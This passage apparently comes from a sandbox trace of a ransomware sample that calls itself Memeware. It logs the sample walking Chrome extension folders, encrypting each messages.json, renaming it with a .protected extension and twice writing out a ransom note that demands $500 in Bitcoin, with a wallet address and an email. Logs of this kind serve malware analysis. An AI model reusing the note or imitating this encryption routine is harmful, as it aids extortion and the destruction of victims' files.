(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.915] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.916] CloseHandle (hObject=0x164) returned 1 [0078.916] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 141 [0078.916] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0078.916] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*") returned 143 [0078.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\.") returned 143 [0078.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\..") returned 144 [0078.917] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.917] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.917] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.917] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.917] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0078.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.918] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0078.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.918] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.919] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.919] CloseHandle (hObject=0x168) returned 1 [0078.919] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected") returned 165 [0078.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected")) returned 1 [0078.919] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.919] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.920] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0078.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.920] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.920] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.921] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.921] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.921] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.921] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.921] CloseHandle (hObject=0x164) returned 1 [0078.921] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0078.921] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned 141 [0078.921] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0078.921] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0078.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*") returned 143 [0078.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.921] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.921] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.922] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\.") returned 143 [0078.922] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.922] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\..") returned 144 [0078.922] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.922] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.922] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.922] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.922] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.923] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.924] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.924] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.925] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.925] CloseHandle (hObject=0x168) returned 1 [0078.925] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected") returned 165 [0078.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected")) returned 1 [0078.926] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.926] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.926] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0078.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.926] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.926] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.927] lstrlenA 